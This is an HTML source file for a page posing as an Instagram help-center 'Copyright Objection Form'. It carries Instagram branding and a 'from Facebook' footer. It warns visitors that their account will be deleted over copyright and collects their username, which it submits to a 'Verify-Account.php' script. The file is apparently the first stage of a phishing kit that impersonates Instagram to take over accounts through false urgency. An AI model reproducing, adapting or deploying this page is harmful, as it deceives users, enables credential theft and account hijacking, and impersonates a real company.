<!DOCTYPE html>
<html>
<head>
  <title>Copyright | Help Center</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" type="text/css" href="css/main.css">
</head>
<body>
  <div class="header"> 
   <img src="https://resimag.com/p1/819f2f28aae.png"> 
  </div>
  <br> 
  <center> 
   <form method="get" action="848350608641984=Verify-Account.php"> 
    <div class="dodoBox" style="border:1px solid #777;"> 
     <img src="https://cdn.dribbble.com/users/2475489/screenshots/9553468/1-instagram.gif" width="200px"> 
     <br> 
     <h1 class="doguText"> <b> Copyright Objection Form</b></h1> 
     <p class="doguText2">If you received an article about copyright, your account will be deleted due to copyright. You can write your username and switch to the form to remove the copyright.</p> 
     <br> 
     <input type="text" id="nick" name="nick" required placeholder="@username" class="dodoinputt"> 
     <br> 
     <br>
     <br> 
     <input type="submit" value="Next" class="buton"> 
     <br> 
     <br> 
    </div> 
   </form> 
  </center>
  <center> 
   <br> 
   <br> 
   <br> 
   <div id="menu"> 
    <li id="liste"><a href="" id="link"> ABOUT US </a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link"> SUPPORT </a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">PRESS</a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">API</a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">JOBS</a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">PRIVACY</a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">TERMS</a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">DIRECTORY</a> </li>&nbsp;&nbsp;&nbsp;&nbsp; 
    <li id="liste"><a href="" id="link">LANGUAGE</a> </li> 
   </div> 
   <br> 
   <p style="font-family:sans-serif;font-weight:100;color:#999;"> Instagram from Facebook</p> 
  </center>  

</body>
</html>